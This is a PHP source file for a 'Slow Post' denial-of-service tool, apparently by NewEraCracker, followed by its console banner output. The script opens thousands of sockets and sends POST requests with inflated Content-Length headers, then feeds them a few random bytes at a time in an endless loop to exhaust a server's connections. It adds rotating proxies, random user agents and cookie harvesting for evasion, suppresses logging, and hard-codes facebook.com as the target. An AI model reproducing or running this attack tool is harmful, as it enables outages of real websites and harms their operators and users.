<?php $_SERVER['argv'][1] = 'http://www.facebook.com/'; //------------------------- // CONFiG //------------------------- $CONFIG['max_cookies'] = 10; $CONFIG['max_sockets'] = 9001; $CONFIG['timeout_ms'] = 500; //------------------------- // INiT //------------------------- // Check PHP Version if(version_compare(PHP_VERSION, '5.0.4') < 0) { exitWithError('This script only supports PHP 5.0.4 and higher.'); } // Define exploit version if(!defined('EXPLOIT_VERSION')) { define('EXPLOIT_VERSION', 'v4.1.3'); } // Define input stream if(!defined('STDIN')) { define('STDIN', fopen('php://stdin', 'r')); } //------------------------- // FUNCTIONS //------------------------- /** Read STDIN and return it */ function readSTDIN($message) { echo PHP_EOL.$message.' : '; return trim(fgets(STDIN)); } /** Exit with error message */ function exitWithError($message) { echo '[ERROR] '.$message; exit(1); } /** Returns a random useragent */ function randomUserAgent() { $os1 = mt_rand(5, 6); /* Random major Windows version */ $os2 = mt_rand(0, 2); /* Random minor Windows version */ $ffv = mt_rand(17, 22); /* Random major Firefox version */ return "Mozilla/5.0 (Windows NT {$os1}.{$os2}; rv:{$ffv}.0) Gecko/20100101 Firefox/{$ffv}.0"; } /** Build stream context or header for connection */ function buildStreamContext($newEraUrl, $newEraProxy, $method='GET', $length='0', $cookie='', $just_header=false) { // Init $proxy = $newEraProxy ? $newEraProxy->full_url : ''; $fulluri = ($newEraProxy && !$newEraUrl->ssl) ? true : false; $header = ''; // When we return header, set the GET/POST line if($just_header) $header .= $method.' '.($fulluri ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n"; // Continue building the header $header .= 'Host: '.$newEraUrl->name."\r\n"; $header .= 'Connection: Keep-Alive'."\r\n"; $header .= 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n"; $header .= 'User-Agent: '.randomUserAgent()."\r\n"; $header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n"; $header .= 'Accept-Encoding: gzip,deflate'."\r\n"; $header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n"; if($method == 'POST') { $header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n"; $header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : ''; $header .= ($cookie ? "Cookie: {$cookie}\r\n" : ''); $header .= "Content-Length: {$length}\r\n"; } // When we return header, return it with an extra EOL for termination if($just_header) return $header."\r\n"; // Build stream context $context = stream_context_create(array( 'http' => array( 'method' => $method, 'timeout' => (2), 'header' => $header, 'proxy' => $proxy, 'request_fulluri' => $fulluri, 'max_redirects' => (0), 'protocol_version' => (1.1), 'ignore_errors' => true ), 'ssl' => array( 'verify_peer' => false ))); return $context; } /** Start slowPost */ function slowPostStart($newEraUrl, $newEraProxy, $cookie) { $obj = ($newEraProxy ? $newEraProxy : $newEraUrl); $host = ($obj->ssl ? 'ssl://' : 'tcp://').$obj->name; // Connect if($socket = @fsockopen($host, $obj->port, $errno, $errstr, 2)) { // Generate random Content-Length $length = mt_rand(1337, 133700); if($newEraProxy && $newEraUrl->ssl) { // We must enable crypto when using a proxy and url with ssl $header = 'CONNECT '.$newEraUrl->name.':'.$newEraUrl->port."\r\n"; $header .= 'Host: '.$newEraUrl->name.':'.$newEraUrl->port."\r\n"; $header .= 'Proxy-Connection: Keep-Alive'."\r\n\r\n"; @fwrite($socket, $header); do { $s = trim(@fread($socket, 8192)); } while($s); @stream_socket_enable_crypto($socket, true, STREAM_CRYPTO_METHOD_SSLv3_CLIENT); } // Send header if(@fwrite($socket, buildStreamContext($newEraUrl, $newEraProxy, 'POST', $length, $cookie, true))) { // Set the socket to be asynchronous stream_set_blocking($socket, 0); stream_set_timeout($socket, 0, $GLOBALS['CONFIG']['timeout_ms']); // Return socket and the length remaining return array('socket' => $socket, 'length' => $length); } } return false; } /** Continue slowPost */ function slowPostContinue($socket, $bytes = 5) { // Sanity check if(!$socket) return false; // Do it $str = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $str = substr(str_shuffle($str), 0, $bytes); return @fwrite($socket, $str); } //------------------------- // CLASSES //------------------------- /** Class to construct and handle cookie-like object */ class NewEraCookie { private $max_cookies; private $cookies = array(); /** Constructor */ public function __construct($newEraUrl, $newEraMultipleProxy) { $this->update_object($newEraUrl, $newEraMultipleProxy); } /** Object updater */ public function update_object($newEraUrl, $newEraMultipleProxy) { $this->max_cookies = $GLOBALS['CONFIG']['max_cookies']; $this->cookies = array(); for($i = 0; $i < $this->max_cookies; $i++) { if($newEraMultipleProxy) { $this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraMultipleProxy->fetch()); } else { $this->cookies[$i] = self::cookieGrab($newEraUrl); } } } /** Returns a cookie by its index */ public function returnRandomCookie() { $key = mt_rand(0, $this->max_cookies - 1); return (isset($this->cookies[$key]) ? $this->cookies[$key] : ''); } /** Function to parse set-cookie from header fields */ public static function cookieParse($header) { $cookies = array(); foreach($header as $line) { if(stripos($line, 'Set-Cookie:') === 0) { $line = trim(str_ireplace('Set-Cookie:', '', $line)); $csplit = explode(';', $line); $cdata = array(); $grabbed_cookie_data = false; foreach($csplit as $data) { $cinfo = explode('=', $data); $cinfo[0] = trim($cinfo[0]); if(!$grabbed_cookie_data) { $cdata['value']['key'] = $cinfo[0]; $cdata['value']['value'] = $cinfo[1]; $grabbed_cookie_data = true; continue; } $cinfo[0] = strtolower($cinfo[0]); if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]); if($cinfo[0] == 'secure') $cinfo[1] = 'true'; if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) { $cdata[$cinfo[0]] = $cinfo[1]; } } $cookies[] = $cdata; } } return $cookies; } /** Function to build the request cookie header from parsed set-cookie data */ public static function cookieBuild($data) { if(is_array($data)) { $cookie = array(); foreach($data as $d) $cookie[] = $d['value']['key'].'='.$d['value']['value']; if(count($cookie) > 0) return trim(implode('; ', $cookie)); } return false; } /** Function to grab cookies from an url using PHP's fopen */ public static function cookieGrab($newEraUrl, $newEraProxy = null) { $cookie = ''; $handle = @fopen($newEraUrl->full_url, 'r', false, buildStreamContext($newEraUrl, $newEraProxy, 'GET')); // I hope this does work if($handle) { // Grab the cookies $metadata = stream_get_meta_data($handle); $cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data'])); @fclose($handle); } return $cookie; } } /** Class to construct and handle proxy-like object */ class NewEraProxy { private $proxy_full_url; private $proxy_name; private $proxy_port; /** Constructor */ public function __construct($url) { $this->update_object($url); } /** Object updater */ public function update_object($url) { if(FALSE !== ($tmp = strpos($url, '://'))) { $tmp += 3; $url = substr($url, $tmp); } $url = explode(':', $url); // Proxy: Name, port and full URL $this->proxy_name = $url[0]; $this->proxy_port = (int)(isset($url[1]) ? $url[1] : '8080'); $this->proxy_full_url = 'tcp://'.$this->proxy_name.':'.$this->proxy_port; } /** Getter for the private properties */ public function __get($var) { $var = 'proxy_'.$var; if(isset($this->{$var})) return $this->{$var}; } } /** Class to construct and handle url-like object */ class NewEraUrl { /** MD5 to allow object identification */ private $host_obj_md5; /** Other parameters */ private $host_full_url; private $host_protocol; private $host_ssl; private $host_name; private $host_port; private $host_path; /** Constructor */ public function __construct($url) { $this->update_object($url); } /** Object updater */ public function update_object($url) { // Save MD5 identifier and full URL $this->host_obj_md5 = md5($url); $this->host_full_url = $url; // URL: SSL and protocol $this->host_ssl = (strpos($url, 'https') === 0) ? true : false; $this->host_protocol = ($this->host_ssl ? 'https' : 'http'); $url = explode('/', $url, 4); $url[2] = explode(':', $url[2], 2); // URL: Name, port and path $this->host_name = $url[2][0]; $this->host_port = (isset($url[2][1]) ? $url[2][1] : ($this->host_ssl ? 443 : 80)); $this->host_path = '/'.(isset($url[3]) ? $url[3] : ''); } /** Getter for the private properties */ public function __get($var) { $var = 'host_'.$var; if(isset($this->{$var})) { // Random support $str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $str = substr(str_shuffle($str), 0, 8); // Return string with random generated content return str_replace('%rand%', $str, $this->{$var}); } } /** Quick check to see if url is minimally valid */ public static function isValid($url) { if(strpos($url, 'https://') === 0) { if(!extension_loaded('openssl')) { exitWithError('OpenSSL extension is not loaded - Unable to access HTTPS URL.'); } return true; } else if(strpos($url, 'http://') === 0) { return true; } return false; } } /** Class to construct and handle multiple cookie-like objects */ class NewEraMultipleCookie { private $newEraCookie_array = array(); public function __construct($newEraMultipleUrl, $newEraMultipleProxy) { // Reset internal object array pointers $newEraMultipleUrl->reset(); if($newEraMultipleProxy) { $newEraMultipleProxy->reset(); } // Build each cookie object for($i = 0; $i < $newEraMultipleUrl->number(); $i++) { $newEraUrl = $newEraMultipleUrl->fetch(); $this->newEraCookie_array[$newEraUrl->obj_md5] = new NewEraCookie($newEraUrl, $newEraMultipleProxy); } } public function fetch($newEraUrl) { if(isset($this->newEraCookie_array[$newEraUrl->obj_md5])) { return $this->newEraCookie_array[$newEraUrl->obj_md5]; } else { // No cookie is defined at all return null; } } } /** Class to construct and handle multiple proxy-like objects */ class NewEraMultipleProxy { private $newEraProxy_array = array(); private $newEraProxy_idx = -1; public function __construct($arg) { $grabbed = false; if($proxy = explode(':', $arg)) { // Attempt to grab a single proxy if(isset($proxy[0], $proxy[1])) { $proxy[1] = (int)$proxy[1]; if(!empty($proxy[1])) { $grabbed = true; $this->newEraProxy_array[] = new NewEraProxy($proxy[0].':'.$proxy[1]); } } } if((!$grabbed) && is_readable($arg)) { // Build from file if($content = @file($arg)) { foreach($content as $proxy) { $proxy = explode(':', trim($proxy)); if(isset($proxy[0], $proxy[1])) { $proxy[1] = (int)$proxy[1]; if(!empty($proxy[1])) { $grabbed = true; $this->newEraProxy_array[] = new NewEraProxy($proxy[0].':'.$proxy[1]); } } } } else { exitWithError($arg.' is not a valid proxy-list file!'); } } } public function number() { return count($this->newEraProxy_array); } public function reset() { $this->newEraProxy_idx = -1; } public function fetch() { $this->newEraProxy_idx++; if(isset($this->newEraProxy_array[$this->newEraProxy_idx])) { return $this->newEraProxy_array[$this->newEraProxy_idx]; } else { $this->newEraProxy_idx = 0; if(isset($this->newEraProxy_array[$this->newEraProxy_idx])) { return $this->newEraProxy_array[$this->newEraProxy_idx]; } else { // No proxy is defined at all return null; } } } } /** Class to construct and handle multiple url-like objects */ class NewEraMultipleUrl { private $newEraUrl_array = array(); private $newEraUrl_idx = -1; public function __construct($args) { $args = explode('|', $args); foreach($args as $url) { if(NewEraUrl::isValid($url)) { $this->newEraUrl_array[] = new NewEraUrl($url); } else { exitWithError($url.' is not a valid target!'); } } } public function number() { return count($this->newEraUrl_array); } public function reset() { $this->newEraUrl_idx = -1; } public function fetch() { $this->newEraUrl_idx++; if(isset($this->newEraUrl_array[$this->newEraUrl_idx])) { return $this->newEraUrl_array[$this->newEraUrl_idx]; } else { $this->newEraUrl_idx = 0; if(isset($this->newEraUrl_array[$this->newEraUrl_idx])) { return $this->newEraUrl_array[$this->newEraUrl_idx]; } else { // No URL is defined at all return null; } } } } //------------------------- // MAiN CODE FOR THE LULZ //------------------------- if(PHP_SAPI != 'cli') { // Send header if not using CLI PHP header('Content-Type: text/plain'); } echo " _______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| ".PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL; if(PHP_SAPI != 'cli') { // Check if input is set if not using CLI PHP if(!isset($_SERVER['argv'][1]) || !NewEraUrl::isValid($_SERVER['argv'][1])) { exitWithError('This script is not meant to be ran via browser.'); } } // We seem to be running this in a quite good fashion @set_time_limit(0); @ini_set('error_log',''); @ini_set('log_errors',0); @ignore_user_abort(true); // Fetch the URL to attack and the proxy to use $url = $proxy = null; if(isset($_SERVER['argv'][1])) { $url = $_SERVER['argv'][1]; $proxy = (isset($_SERVER['argv'][2]) ? $_SERVER['argv'][2] : null); } // Interactive Run if(empty($url)) { // Ask for proxy do { switch($tmp = strtolower(substr(readSTDIN('Do you want to use a proxy [yes/no/file]'), 0, 1))) { case 'n': break; case 'y': $proxy = readSTDIN('Proxy IP'); $proxy .= ':'; $proxy .= (int)(readSTDIN('Proxy port')); break; case 'f': $proxy = readSTDIN('Proxy file'); if(!is_readable($proxy)) { echo PHP_EOL.'Invalid file!'.PHP_EOL; $tmp = null; } break; default: echo PHP_EOL.'Invalid choice!'.PHP_EOL; $tmp = null; break; } } while(!$tmp); // Ask for target URL do { $url = readSTDIN('Target url'); if(!NewEraUrl::isValid($url)) { echo PHP_EOL.'Invalid target!'.PHP_EOL; $url = null; } } while(!$url); } // Start $conn = array(); echo PHP_EOL.'IMMA FIRIN MAH LAZOR '; $newEraMultipleProxy = (empty($proxy) ? null : (new NewEraMultipleProxy($proxy))); $newEraMultipleUrl = new NewEraMultipleUrl($url); $newEraMultipleCookie = new NewEraMultipleCookie($newEraMultipleUrl, $newEraMultipleProxy); // Do it while(1) { for($i = 0; $i < $CONFIG['max_sockets']; $i++) { $newEraUrl = $newEraMultipleUrl->fetch(); $newEraCookie = $newEraMultipleCookie->fetch($newEraUrl); $newEraProxy = ($newEraMultipleProxy ? $newEraMultipleProxy->fetch() : null); // Open a new socket if($tmp = slowPostStart($newEraUrl, $newEraProxy, $newEraCookie->returnRandomCookie())) { if(isset($conn[$i], $conn[$i]['socket'])) { // Close an opened connection @fclose($conn[$i]['socket']); unset($conn[$i]); } // Save the new connection $conn[$i] = $tmp; // Progress bar echo '.'; } // Check the current slowPosts foreach($conn as $k => $v) { if($conn[$k]['socket'] && ($conn[$k]['length'] > 0)) { // Contine current $tmp = ($conn[$k]['length'] < 5) ? $conn[$k]['length'] : 5; slowPostContinue($conn[$k]['socket'], $tmp); $conn[$k]['length'] -= $tmp; } else { // Close completed @fclose($conn[$k]['socket']); unset($conn[$k]); } } } } ?>
_______. __ ______ ____ __ ____ / || | / __ \ \ \ / \ / / | (----`| | | | | | \ \/ \/ / \ \ | | | | | | \ / .----) | | `----.| `--' | \ /\ / |_______/ |_______| \______/ \__/ \__/ .______ ______ _______.___________. | _ \ / __ \ / | | | |_) | | | | | | (----`---| |----` | ___/ | | | | \ \ | | | | | `--' | .----) | | | | _| \______/ |_______/ |__| v4.1.3 by NewEraCracker IMMA FIRIN MAH LAZOR
